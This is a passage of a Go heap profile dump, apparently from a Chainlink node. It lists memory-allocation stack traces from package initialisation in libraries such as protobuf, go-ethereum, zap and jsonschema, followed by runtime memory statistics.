# 0xddacf9 github.com/santhosh-tekuri/jsonschema/v5.(*Compiler).Compile+0xd9 /go/pkg/mod/github.com/santhosh-tekuri/jsonschema/v5@v5.3.1/compiler.go:133
# 0xddab97 github.com/santhosh-tekuri/jsonschema/v5.(*Compiler).MustCompile+0x17 /go/pkg/mod/github.com/santhosh-tekuri/jsonschema/v5@v5.3.1/compiler.go:114
# 0xde207d github.com/santhosh-tekuri/jsonschema/v5.(*Draft).loadMeta+0x17d /go/pkg/mod/github.com/santhosh-tekuri/jsonschema/v5@v5.3.1/draft.go:46
# 0xde37bc github.com/santhosh-tekuri/jsonschema/v5.init.0+0x77c /go/pkg/mod/github.com/santhosh-tekuri/jsonschema/v5@v5.3.1/draft.go:447
# 0x469114 runtime.doInit1+0xd4 /usr/local/go/src/runtime/proc.go:8103
# 0x4596cf runtime.doInit+0x26f /usr/local/go/src/runtime/proc.go:8070
# 0x4596a6 runtime.main+0x246 /usr/local/go/src/runtime/proc.go:258
2: 1792 [2: 1792] @ 0x48e86c 0x4287c5 0xde7905 0xddbb7c 0xde0874 0xde07ce 0xddc4d3 0xddbadf 0xddb7f8 0xddbcdf 0xddc945 0xddc4d3 0xddbbec 0xde1b87 0xde19ff 0xdddaed 0xddc4d3 0xddbadf 0xddb7f8 0xddacfa 0xddab98 0xde207e 0xde382d 0x469115 0x4596d0 0x4596a7 0x4994c1
# 0xde7904 github.com/santhosh-tekuri/jsonschema/v5.newSchema+0x44 /go/pkg/mod/github.com/santhosh-tekuri/jsonschema/v5@v5.3.1/schema.go:113
# 0xddbb7b github.com/santhosh-tekuri/jsonschema/v5.(*Compiler).compileRef+0x31b /go/pkg/mod/github.com/santhosh-tekuri/jsonschema/v5@v5.3.1/compiler.go:261
# 0xde0873 github.com/santhosh-tekuri/jsonschema/v5.(*Compiler).compileMap.func3+0x42f3 /go/pkg/mod/github.com/santhosh-tekuri/jsonschema/v5@v5.3.1/compiler.go:484
# 0xde07cd github.com/santhosh-tekuri/jsonschema/v5.(*Compiler).compileMap+0x424d /go/pkg/mod/github.com/santhosh-tekuri/jsonschema/v5@v5.3.1/compiler.go:528
# 0xddc4d2 github.com/santhosh-tekuri/jsonschema/v5.(*Compiler).compile+0x132 /go/pkg/mod/github.com/santhosh-tekuri/jsonschema/v5@v5.3.1/compiler.go:296
# 0xddbade github.com/santhosh-tekuri/jsonschema/v5.(*Compiler).compileRef+0x27e /go/pkg/mod/github.com/santhosh-tekuri/jsonschema/v5@v5.3.1/compiler.go:241
# 0xddb7f7 github.com/santhosh-tekuri/jsonschema/v5.(*Compiler).compileURL+0xf7 /go/pkg/mod/github.com/santhosh-tekuri/jsonschema/v5@v5.3.1/compiler.go:220
# 0xddbcde github.com/santhosh-tekuri/jsonschema/v5.(*Compiler).compileRef+0x47e /go/pkg/mod/github.com/santhosh-tekuri/jsonschema/v5@v5.3.1/compiler.go:234
# 0xddc944 github.com/santhosh-tekuri/jsonschema/v5.(*Compiler).compileMap+0x3c4 /go/pkg/mod/github.com/santhosh-tekuri/jsonschema/v5@v5.3.1/compiler.go:325
# 0xddc4d2 github.com/santhosh-tekuri/jsonschema/v5.(*Compiler).compile+0x132 /go/pkg/mod/github.com/santhosh-tekuri/jsonschema/v5@v5.3.1/compiler.go:296
# 0xddbbeb github.com/santhosh-tekuri/jsonschema/v5.(*Compiler).compileRef+0x38b /go/pkg/mod/github.com/santhosh-tekuri/jsonschema/v5@v5.3.1/compiler.go:262
# 0xde1b86 github.com/santhosh-tekuri/jsonschema/v5.(*Compiler).compileMap.func3+0xc6 /go/pkg/mod/github.com/santhosh-tekuri/jsonschema/v5@v5.3.1/compiler.go:484
# 0xde19fe github.com/santhosh-tekuri/jsonschema/v5.(*Compiler).compileMap.func5+0x13e /go/pkg/mod/github.com/santhosh-tekuri/jsonschema/v5@v5.3.1/compiler.go:499
# 0xdddaec github.com/santhosh-tekuri/jsonschema/v5.(*Compiler).compileMap+0x156c /go/pkg/mod/github.com/santhosh-tekuri/jsonschema/v5@v5.3.1/compiler.go:514
# 0xddc4d2 github.com/santhosh-tekuri/jsonschema/v5.(*Compiler).compile+0x132 /go/pkg/mod/github.com/santhosh-tekuri/jsonschema/v5@v5.3.1/compiler.go:296
# 0xddbade github.com/santhosh-tekuri/jsonschema/v5.(*Compiler).compileRef+0x27e /go/pkg/mod/github.com/santhosh-tekuri/jsonschema/v5@v5.3.1/compiler.go:241
# 0xddb7f7 github.com/santhosh-tekuri/jsonschema/v5.(*Compiler).compileURL+0xf7 /go/pkg/mod/github.com/santhosh-tekuri/jsonschema/v5@v5.3.1/compiler.go:220
# 0xddacf9 github.com/santhosh-tekuri/jsonschema/v5.(*Compiler).Compile+0xd9 /go/pkg/mod/github.com/santhosh-tekuri/jsonschema/v5@v5.3.1/compiler.go:133
# 0xddab97 github.com/santhosh-tekuri/jsonschema/v5.(*Compiler).MustCompile+0x17 /go/pkg/mod/github.com/santhosh-tekuri/jsonschema/v5@v5.3.1/compiler.go:114
# 0xde207d github.com/santhosh-tekuri/jsonschema/v5.(*Draft).loadMeta+0x17d /go/pkg/mod/github.com/santhosh-tekuri/jsonschema/v5@v5.3.1/draft.go:46
# 0xde382c github.com/santhosh-tekuri/jsonschema/v5.init.0+0x7ec /go/pkg/mod/github.com/santhosh-tekuri/jsonschema/v5@v5.3.1/draft.go:812
# 0x469114 runtime.doInit1+0xd4 /usr/local/go/src/runtime/proc.go:8103
# 0x4596cf runtime.doInit+0x26f /usr/local/go/src/runtime/proc.go:8070
# 0x4596a6 runtime.main+0x246 /usr/local/go/src/runtime/proc.go:258
1: 2048 [1: 2048] @ 0x48e86c 0x4287c5 0x45d531 0x45e075 0x45e730 0x4912ec 0x460d9e 0x4612c7 0x4616e5 0x497875
# 0x48e86b runtime.mallocgc+0xab /usr/local/go/src/runtime/malloc.go:1152
# 0x4287c4 runtime.newobject+0x24 /usr/local/go/src/runtime/malloc.go:2157
# 0x45d530 runtime.allocm+0x90 /usr/local/go/src/runtime/proc.go:2324
# 0x45e074 runtime.newm+0x34 /usr/local/go/src/runtime/proc.go:2870
# 0x45e72f runtime.startm+0x12f /usr/local/go/src/runtime/proc.go:3096
# 0x4912eb runtime.wakep+0xeb /usr/local/go/src/runtime/proc.go:3243
# 0x460d9d runtime.resetspinning+0x3d /usr/local/go/src/runtime/proc.go:4034
# 0x4612c6 runtime.schedule+0x126 /usr/local/go/src/runtime/proc.go:4199
# 0x4616e4 runtime.park_m+0x284 /usr/local/go/src/runtime/proc.go:4304
# 0x497874 runtime.mcall+0x54 /usr/local/go/src/runtime/asm_amd64.s:496
2: 2304 [2: 2304] @ 0x48e86c 0x48e965 0x48e966 0x4168b3 0x19a8af9 0x19a814f 0x469115 0x4596d0 0x4596a7 0x4994c1
# 0x19a8af8 github.com/smartcontractkit/chainlink-evm/pkg/config/toml.initDefaults+0x6f8 /go/pkg/mod/github.com/smartcontractkit/chainlink-evm@v0.3.4-0.20260728111445-96c471be2872/pkg/config/toml/defaults.go:128
# 0x19a814e github.com/smartcontractkit/chainlink-evm/pkg/config/toml.init.0+0x6e /go/pkg/mod/github.com/smartcontractkit/chainlink-evm@v0.3.4-0.20260728111445-96c471be2872/pkg/config/toml/defaults.go:42
# 0x469114 runtime.doInit1+0xd4 /usr/local/go/src/runtime/proc.go:8103
# 0x4596cf runtime.doInit+0x26f /usr/local/go/src/runtime/proc.go:8070
# 0x4596a6 runtime.main+0x246 /usr/local/go/src/runtime/proc.go:258
1: 3072 [1: 3072] @ 0x48e86c 0x494207 0x6bf65b 0x6bf6a0 0x6bece5 0x6be9ed 0x6beacf 0x6be9ed 0x6be5a6 0x6beacf 0x6bd78b 0x6d2157 0x6d2c6c 0x6d2c60 0x19da668 0x469115 0x4596d0 0x4596a7 0x4994c1
# 0x6bf65a regexp/syntax.(*compiler).inst+0x9a /usr/local/go/src/regexp/syntax/compile.go:164
# 0x6bf69f regexp/syntax.(*compiler).rune+0xdf /usr/local/go/src/regexp/syntax/compile.go:273
# 0x6bece4 regexp/syntax.(*compiler).compile+0x13c4 /usr/local/go/src/regexp/syntax/compile.go:101
# 0x6be9ec regexp/syntax.(*compiler).compile+0x10cc /usr/local/go/src/regexp/syntax/compile.go:154
# 0x6beace regexp/syntax.(*compiler).compile+0x11ae /usr/local/go/src/regexp/syntax/compile.go:147
# 0x6be9ec regexp/syntax.(*compiler).compile+0x10cc /usr/local/go/src/regexp/syntax/compile.go:154
# 0x6be5a5 regexp/syntax.(*compiler).compile+0xc85 /usr/local/go/src/regexp/syntax/compile.go:129
# 0x6beace regexp/syntax.(*compiler).compile+0x11ae /usr/local/go/src/regexp/syntax/compile.go:147
# 0x6bd78a regexp/syntax.Compile+0x12a /usr/local/go/src/regexp/syntax/compile.go:74
# 0x6d2156 regexp.compile+0x76 /usr/local/go/src/regexp/regexp.go:176
# 0x6d2c6b regexp.Compile+0x2b /usr/local/go/src/regexp/regexp.go:131
# 0x6d2c5f regexp.MustCompile+0x1f /usr/local/go/src/regexp/regexp.go:311
# 0x19da667 github.com/smartcontractkit/chainlink-evm/pkg/client.init+0x2087 /go/pkg/mod/github.com/smartcontractkit/chainlink-evm@v0.3.4-0.20260728111445-96c471be2872/pkg/client/errors.go:276
# 0x469114 runtime.doInit1+0xd4 /usr/local/go/src/runtime/proc.go:8103
# 0x4596cf runtime.doInit+0x26f /usr/local/go/src/runtime/proc.go:8070
# 0x4596a6 runtime.main+0x246 /usr/local/go/src/runtime/proc.go:258
2: 4096 [2: 4096] @ 0x48e86c 0x4287c5 0x45d531 0x45e075 0x45e730 0x4912ec 0x460d9e 0x4612c7 0x45cd6d 0x45cc75 0x4977ec
# 0x48e86b runtime.mallocgc+0xab /usr/local/go/src/runtime/malloc.go:1152
# 0x4287c4 runtime.newobject+0x24 /usr/local/go/src/runtime/malloc.go:2157
# 0x45d530 runtime.allocm+0x90 /usr/local/go/src/runtime/proc.go:2324
# 0x45e074 runtime.newm+0x34 /usr/local/go/src/runtime/proc.go:2870
# 0x45e72f runtime.startm+0x12f /usr/local/go/src/runtime/proc.go:3096
# 0x4912eb runtime.wakep+0xeb /usr/local/go/src/runtime/proc.go:3243
# 0x460d9d runtime.resetspinning+0x3d /usr/local/go/src/runtime/proc.go:4034
# 0x4612c6 runtime.schedule+0x126 /usr/local/go/src/runtime/proc.go:4199
# 0x45cd6c runtime.mstart1+0xcc /usr/local/go/src/runtime/proc.go:1942
# 0x45cc74 runtime.mstart0+0x74 /usr/local/go/src/runtime/proc.go:1888
# 0x4977eb runtime.mstart+0xb /usr/local/go/src/runtime/asm_amd64.s:426
1: 9472 [1: 9472] @ 0x48e86c 0x493c69 0x765a91 0x765a0a 0x76233e 0x7ea07a 0xf39485 0xf38daf 0x469115 0x4596d0 0x4596a7 0x4994c1
# 0x765a90 google.golang.org/protobuf/internal/filedesc.(*File).initDecls+0x110 /go/pkg/mod/google.golang.org/protobuf@v1.36.11/internal/filedesc/desc_init.go:51
# 0x765a09 google.golang.org/protobuf/internal/filedesc.newRawFile+0x89 /go/pkg/mod/google.golang.org/protobuf@v1.36.11/internal/filedesc/desc_init.go:29
# 0x76233d google.golang.org/protobuf/internal/filedesc.Builder.Build+0x11d /go/pkg/mod/google.golang.org/protobuf@v1.36.11/internal/filedesc/build.go:105
# 0x7ea079 google.golang.org/protobuf/internal/filetype.Builder.Build+0x199 /go/pkg/mod/google.golang.org/protobuf@v1.36.11/internal/filetype/build.go:138
# 0xf39484 github.com/smartcontractkit/chainlink-protos/cre/go/sdk.file_sdk_v1alpha_sdk_proto_init+0x6c4 /go/pkg/mod/github.com/smartcontractkit/chainlink-protos/cre/go@v0.0.0-20260622152157-c8e129347b8b/sdk/sdk.pb.go:2768
# 0xf38dae github.com/smartcontractkit/chainlink-protos/cre/go/sdk.init.0+0xe /go/pkg/mod/github.com/smartcontractkit/chainlink-protos/cre/go@v0.0.0-20260622152157-c8e129347b8b/sdk/sdk.pb.go:2711
# 0x469114 runtime.doInit1+0xd4 /usr/local/go/src/runtime/proc.go:8103
# 0x4596cf runtime.doInit+0x26f /usr/local/go/src/runtime/proc.go:8070
# 0x4596a6 runtime.main+0x246 /usr/local/go/src/runtime/proc.go:258
1: 12288 [1: 12288] @ 0x48e86c 0x494207 0x6bf65b 0x6bf6a0 0x6bece5 0x6beacf 0x6be9ed 0x6beacf 0x6be5a6 0x6be832 0x6be9ed 0x6beacf 0x6be5a6 0x6beacf 0x6bd78b 0x6d2157 0x6d2c6c 0x6d2c60 0x19d9f08 0x469115 0x4596d0 0x4596a7 0x4994c1
# 0x6bf65a regexp/syntax.(*compiler).inst+0x9a /usr/local/go/src/regexp/syntax/compile.go:164
# 0x6bf69f regexp/syntax.(*compiler).rune+0xdf /usr/local/go/src/regexp/syntax/compile.go:273
# 0x6bece4 regexp/syntax.(*compiler).compile+0x13c4 /usr/local/go/src/regexp/syntax/compile.go:101
# 0x6beace regexp/syntax.(*compiler).compile+0x11ae /usr/local/go/src/regexp/syntax/compile.go:147
# 0x6be9ec regexp/syntax.(*compiler).compile+0x10cc /usr/local/go/src/regexp/syntax/compile.go:154
# 0x6beace regexp/syntax.(*compiler).compile+0x11ae /usr/local/go/src/regexp/syntax/compile.go:147
# 0x6be5a5 regexp/syntax.(*compiler).compile+0xc85 /usr/local/go/src/regexp/syntax/compile.go:129
# 0x6be831 regexp/syntax.(*compiler).compile+0xf11 /usr/local/go/src/regexp/syntax/compile.go:137
# 0x6be9ec regexp/syntax.(*compiler).compile+0x10cc /usr/local/go/src/regexp/syntax/compile.go:154
# 0x6beace regexp/syntax.(*compiler).compile+0x11ae /usr/local/go/src/regexp/syntax/compile.go:147
# 0x6be5a5 regexp/syntax.(*compiler).compile+0xc85 /usr/local/go/src/regexp/syntax/compile.go:129
# 0x6beace regexp/syntax.(*compiler).compile+0x11ae /usr/local/go/src/regexp/syntax/compile.go:147
# 0x6bd78a regexp/syntax.Compile+0x12a /usr/local/go/src/regexp/syntax/compile.go:74
# 0x6d2156 regexp.compile+0x76 /usr/local/go/src/regexp/regexp.go:176
# 0x6d2c6b regexp.Compile+0x2b /usr/local/go/src/regexp/regexp.go:131
# 0x6d2c5f regexp.MustCompile+0x1f /usr/local/go/src/regexp/regexp.go:311
# 0x19d9f07 github.com/smartcontractkit/chainlink-evm/pkg/client.init+0x1927 /go/pkg/mod/github.com/smartcontractkit/chainlink-evm@v0.3.4-0.20260728111445-96c471be2872/pkg/client/errors.go:226
# 0x469114 runtime.doInit1+0xd4 /usr/local/go/src/runtime/proc.go:8103
# 0x4596cf runtime.doInit+0x26f /usr/local/go/src/runtime/proc.go:8070
# 0x4596a6 runtime.main+0x246 /usr/local/go/src/runtime/proc.go:258
1: 16384 [1: 16384] @ 0x48e88c 0x493c69 0x7398b9 0x739892 0x76f95c 0x76f912 0x76eb7f 0x76b15d 0x769d25 0x762c25 0x763109 0x7630ef 0x763116 0x7d69cf 0x7d6613 0x7cc56e 0x7e142e 0x7e1419 0x73be22 0x73be1b 0x73ba6e 0x9a8d7a 0x469115 0x4596d0 0x4596a7 0x4994c1
# 0x7398b8 google.golang.org/protobuf/internal/strs.(*Builder).grow+0x78 /go/pkg/mod/google.golang.org/protobuf@v1.36.11/internal/strs/strings_unsafe.go:66
# 0x739891 google.golang.org/protobuf/internal/strs.(*Builder).AppendFullName+0x51 /go/pkg/mod/google.golang.org/protobuf@v1.36.11/internal/strs/strings_unsafe.go:43
# 0x76f95b google.golang.org/protobuf/internal/filedesc.appendFullName+0x2db /go/pkg/mod/google.golang.org/protobuf@v1.36.11/internal/filedesc/desc_init.go:573
# 0x76f911 google.golang.org/protobuf/internal/filedesc.(*Field).unmarshalFull+0x291 /go/pkg/mod/google.golang.org/protobuf@v1.36.11/internal/filedesc/desc_lazy.go:449
# 0x76eb7e google.golang.org/protobuf/internal/filedesc.(*Message).unmarshalFull+0x129e /go/pkg/mod/google.golang.org/protobuf@v1.36.11/internal/filedesc/desc_lazy.go:345
# 0x76b15c google.golang.org/protobuf/internal/filedesc.(*File).unmarshalFull+0x39c /go/pkg/mod/google.golang.org/protobuf@v1.36.11/internal/filedesc/desc_lazy.go:167
# 0x769d24 google.golang.org/protobuf/internal/filedesc.(*File).lazyRawInit+0x24 /go/pkg/mod/google.golang.org/protobuf@v1.36.11/internal/filedesc/desc_lazy.go:20
# 0x762c24 google.golang.org/protobuf/internal/filedesc.(*File).lazyInitOnce+0x64 /go/pkg/mod/google.golang.org/protobuf@v1.36.11/internal/filedesc/desc.go:172
# 0x763108 google.golang.org/protobuf/internal/filedesc.(*File).lazyInit+0x28 /go/pkg/mod/google.golang.org/protobuf@v1.36.11/internal/filedesc/desc.go:164
# 0x7630ee google.golang.org/protobuf/internal/filedesc.(*Message).lazyInit+0xe /go/pkg/mod/google.golang.org/protobuf@v1.36.11/internal/filedesc/desc.go:342
# 0x763115 google.golang.org/protobuf/internal/filedesc.(*Message).Fields+0x35 /go/pkg/mod/google.golang.org/protobuf@v1.36.11/internal/filedesc/desc.go:319
# 0x7d69ce google.golang.org/protobuf/internal/impl.(*MessageInfo).makeKnownFieldsFunc+0x6e /go/pkg/mod/google.golang.org/protobuf@v1.36.11/internal/impl/message_reflect.go:57
# 0x7d6612 google.golang.org/protobuf/internal/impl.(*MessageInfo).makeReflectFuncs+0x92 /go/pkg/mod/google.golang.org/protobuf@v1.36.11/internal/impl/message_reflect.go:42
# 0x7cc56d google.golang.org/protobuf/internal/impl.(*MessageInfo).initOnce+0x20d /go/pkg/mod/google.golang.org/protobuf@v1.36.11/internal/impl/message.go:92
# 0x7e142d google.golang.org/protobuf/internal/impl.(*MessageInfo).init+0x2d /go/pkg/mod/google.golang.org/protobuf@v1.36.11/internal/impl/message.go:71
# 0x7e1418 google.golang.org/protobuf/internal/impl.(*messageState).ProtoMethods+0x18 /go/pkg/mod/google.golang.org/protobuf@v1.36.11/internal/impl/message_reflect_gen.go:31
# 0x73be21 google.golang.org/protobuf/proto.protoMethods+0xe1 /go/pkg/mod/google.golang.org/protobuf@v1.36.11/proto/proto_methods.go:19
# 0x73be1a google.golang.org/protobuf/proto.UnmarshalOptions.unmarshal+0xda /go/pkg/mod/google.golang.org/protobuf@v1.36.11/proto/decode.go:100
# 0x73ba6d google.golang.org/protobuf/proto.Unmarshal+0x6d /go/pkg/mod/google.golang.org/protobuf@v1.36.11/proto/decode.go:62
# 0x9a8d79 google.golang.org/protobuf/reflect/protodesc.init.0+0x39 /go/pkg/mod/google.golang.org/protobuf@v1.36.11/reflect/protodesc/editions.go:26
# 0x469114 runtime.doInit1+0xd4 /usr/local/go/src/runtime/proc.go:8103
# 0x4596cf runtime.doInit+0x26f /usr/local/go/src/runtime/proc.go:8070
# 0x4596a6 runtime.main+0x246 /usr/local/go/src/runtime/proc.go:258
1: 18432 [1: 18432] @ 0x48e88c 0x493c69 0x1451467 0x14514e8 0x14526c5 0x1452607 0x15ac535 0x469115 0x4596d0 0x4596a7 0x4994c1
# 0x1451466 github.com/ethereum/go-ethereum/metrics.newExpDecaySampleHeap+0x46 /go/pkg/mod/github.com/ethereum/go-ethereum@v1.17.3/metrics/sample.go:359
# 0x14514e7 github.com/ethereum/go-ethereum/metrics.NewExpDecaySample+0xc7 /go/pkg/mod/github.com/ethereum/go-ethereum@v1.17.3/metrics/sample.go:152
# 0x14526c4 github.com/ethereum/go-ethereum/metrics.NewTimer+0x24 /go/pkg/mod/github.com/ethereum/go-ethereum@v1.17.3/metrics/timer.go:45
# 0x1452606 github.com/ethereum/go-ethereum/metrics.NewRegisteredTimer+0x26 /go/pkg/mod/github.com/ethereum/go-ethereum@v1.17.3/metrics/timer.go:32
# 0x15ac534 github.com/ethereum/go-ethereum/core/txpool/legacypool.init+0x534 /go/pkg/mod/github.com/ethereum/go-ethereum@v1.17.3/core/txpool/legacypool/legacypool.go:120
# 0x469114 runtime.doInit1+0xd4 /usr/local/go/src/runtime/proc.go:8103
# 0x4596cf runtime.doInit+0x26f /usr/local/go/src/runtime/proc.go:8070
# 0x4596a6 runtime.main+0x246 /usr/local/go/src/runtime/proc.go:258
1: 27264 [1: 27264] @ 0x48e86c 0x48ea45 0x48eaf3 0x4137bd 0x4137be 0x41370f 0x411505 0x48eb89 0xc9dde5 0xc96e0f 0x469115 0x4596d0 0x4596a7 0x4994c1
# 0xc9dde4 github.com/go-playground/validator/v10.map.init.7+0x24 /go/pkg/mod/github.com/go-playground/validator/v10@v10.30.2/country_codes.go:191
# 0xc96e0e github.com/go-playground/validator/v10.init+0x16e /go/pkg/mod/github.com/go-playground/validator/v10@v10.30.2/country_codes.go:191
# 0x469114 runtime.doInit1+0xd4 /usr/local/go/src/runtime/proc.go:8103
# 0x4596cf runtime.doInit+0x26f /usr/local/go/src/runtime/proc.go:8070
# 0x4596a6 runtime.main+0x246 /usr/local/go/src/runtime/proc.go:258
1: 40960 [1: 40960] @ 0x48e893 0x48ea45 0x48eaf3 0x4137bd 0x4137be 0x41370f 0x41552e 0x4154b0 0x418851 0x732d0a 0x76241c 0x7ea07a 0xfeb89f 0xfdae15 0xfdadcf 0x469115 0x4596d0 0x4596a7 0x4994c1
# 0x732d09 google.golang.org/protobuf/reflect/protoregistry.(*Files).RegisterFile+0x769 /go/pkg/mod/google.golang.org/protobuf@v1.36.11/reflect/protoregistry/registry.go:165
# 0x76241b google.golang.org/protobuf/internal/filedesc.Builder.Build+0x1fb /go/pkg/mod/google.golang.org/protobuf@v1.36.11/internal/filedesc/build.go:112
# 0x7ea079 google.golang.org/protobuf/internal/filetype.Builder.Build+0x199 /go/pkg/mod/google.golang.org/protobuf@v1.36.11/internal/filetype/build.go:138
# 0xfeb89e github.com/smartcontractkit/chainlink-common/pkg/loop/internal/pb/ccipocr3.file_models_proto_init+0x1be /go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/loop/internal/pb/ccipocr3/models.pb.go:1122
# 0xfdae14 github.com/smartcontractkit/chainlink-common/pkg/loop/internal/pb/ccipocr3.file_chainaccessor_proto_init+0x34 /go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/loop/internal/pb/ccipocr3/chainaccessor.pb.go:4061
# 0xfdadce github.com/smartcontractkit/chainlink-common/pkg/loop/internal/pb/ccipocr3.init.0+0xe /go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/loop/internal/pb/ccipocr3/chainaccessor.pb.go:4056
# 0x469114 runtime.doInit1+0xd4 /usr/local/go/src/runtime/proc.go:8103
# 0x4596cf runtime.doInit+0x26f /usr/local/go/src/runtime/proc.go:8070
# 0x4596a6 runtime.main+0x246 /usr/local/go/src/runtime/proc.go:258
1: 458752 [1: 458752] @ 0x48e893 0x4287c5 0xb1c085 0xb1c0ad 0xb26e18 0xb26cc6 0xb2dcd9 0xb2c270 0xb2bc0c 0xb26046 0x151876c 0x15185fa 0x15185fb 0x469115 0x4596d0 0x4596a7 0x4994c1
# 0xb1c084 go.uber.org/zap/zapcore.newCounters+0x44 /go/pkg/mod/go.uber.org/zap@v1.28.0/zapcore/sampler.go:41
# 0xb1c0ac go.uber.org/zap/zapcore.NewSamplerWithOptions+0x6c /go/pkg/mod/go.uber.org/zap@v1.28.0/zapcore/sampler.go:156
# 0xb26e17 go.uber.org/zap.Config.buildOptions.func1+0xf7 /go/pkg/mod/go.uber.org/zap@v1.28.0/config.go:289
# 0xb26cc5 go.uber.org/zap.Config.buildOptions.WrapCore.func5+0x25 /go/pkg/mod/go.uber.org/zap@v1.28.0/options.go:44
# 0xb2dcd8 go.uber.org/zap.optionFunc.apply+0x18 /go/pkg/mod/go.uber.org/zap@v1.28.0/options.go:38
# 0xb2c26f go.uber.org/zap.(*Logger).WithOptions+0xcf /go/pkg/mod/go.uber.org/zap@v1.28.0/logger.go:172
# 0xb2bc0b go.uber.org/zap.New+0x18b /go/pkg/mod/go.uber.org/zap@v1.28.0/logger.go:79
# 0xb26045 go.uber.org/zap.Config.Build+0x2e5 /go/pkg/mod/go.uber.org/zap@v1.28.0/config.go:254
# 0x151876b github.com/smartcontractkit/wsrpc/logger.(*Config).New+0x10b /go/pkg/mod/github.com/smartcontractkit/wsrpc@v0.8.5-0.20250502134807-c57d3d995945/logger/logger.go:64
# 0x15185f9 github.com/smartcontractkit/wsrpc/logger.New+0x19 /go/pkg/mod/github.com/smartcontractkit/wsrpc@v0.8.5-0.20250502134807-c57d3d995945/logger/logger.go:58
# 0x15185fa github.com/smartcontractkit/wsrpc/logger.init.0+0x1a /go/pkg/mod/github.com/smartcontractkit/wsrpc@v0.8.5-0.20250502134807-c57d3d995945/logger/logger.go:51
# 0x469114 runtime.doInit1+0xd4 /usr/local/go/src/runtime/proc.go:8103
# 0x4596cf runtime.doInit+0x26f /usr/local/go/src/runtime/proc.go:8070
# 0x4596a6 runtime.main+0x246 /usr/local/go/src/runtime/proc.go:258
1: 458752 [1: 458752] @ 0x48e893 0x4287c5 0xb1c085 0xb1c0ad 0xb26e18 0xb26cc6 0xb2dcd9 0xb2c270 0xb2bc0c 0xb26046 0xb2be93 0xb3e9a6 0x469115 0x4596d0 0x4596a7 0x4994c1
# 0xb1c084 go.uber.org/zap/zapcore.newCounters+0x44 /go/pkg/mod/go.uber.org/zap@v1.28.0/zapcore/sampler.go:41
# 0xb1c0ac go.uber.org/zap/zapcore.NewSamplerWithOptions+0x6c /go/pkg/mod/go.uber.org/zap@v1.28.0/zapcore/sampler.go:156
# 0xb26e17 go.uber.org/zap.Config.buildOptions.func1+0xf7 /go/pkg/mod/go.uber.org/zap@v1.28.0/config.go:289
# 0xb26cc5 go.uber.org/zap.Config.buildOptions.WrapCore.func5+0x25 /go/pkg/mod/go.uber.org/zap@v1.28.0/options.go:44
# 0xb2dcd8 go.uber.org/zap.optionFunc.apply+0x18 /go/pkg/mod/go.uber.org/zap@v1.28.0/options.go:38
# 0xb2c26f go.uber.org/zap.(*Logger).WithOptions+0xcf /go/pkg/mod/go.uber.org/zap@v1.28.0/logger.go:172
# 0xb2bc0b go.uber.org/zap.New+0x18b /go/pkg/mod/go.uber.org/zap@v1.28.0/logger.go:79
# 0xb26045 go.uber.org/zap.Config.Build+0x2e5 /go/pkg/mod/go.uber.org/zap@v1.28.0/config.go:254
# 0xb2be92 go.uber.org/zap.NewProduction+0x112 /go/pkg/mod/go.uber.org/zap@v1.28.0/logger.go:101
# 0xb3e9a5 github.com/cloudevents/sdk-go/v2/context.init.0+0x25 /go/pkg/mod/github.com/cloudevents/sdk-go/v2@v2.16.2/context/logger.go:23
# 0x469114 runtime.doInit1+0xd4 /usr/local/go/src/runtime/proc.go:8103
# 0x4596cf runtime.doInit+0x26f /usr/local/go/src/runtime/proc.go:8070
# 0x4596a6 runtime.main+0x246 /usr/local/go/src/runtime/proc.go:258
# runtime.MemStats
# Alloc = 11137840
# TotalAlloc = 20787760
# Sys = 28457224
# Lookups = 0
# Mallocs = 144998
# Frees = 97416
# HeapAlloc = 11137840
# HeapSys = 19726336
# HeapIdle = 4382720
# HeapInuse = 15343616
# HeapReleased = 3121152
# HeapObjects = 47582
# Stack = 1245184 / 1245184
# MSpan = 255040 / 261120
# MCache = 18368 / 32144
# BuckHashSys = 1464721
# GCSys = 4010736
# OtherSys = 1716983
# NextGC = 18448138
# LastGC = 1786604244739929063
# PauseNs = [447379 221173 4499606 117645 405061 334527 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0]
# PauseEnd = [1786604144513714211 1786604144559112804 1786604144606417860 1786604144654903657 1786604144715473581 1786604244739929063 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0]
# NumGC = 6
# NumForcedGC = 0
# GCCPUFraction = 0.00010207673737953116
# DebugGC = false
# MaxRSS = 389332992
# HELP automation_log_trigger_log_provider_latest_block The latest block number the log provider has seen
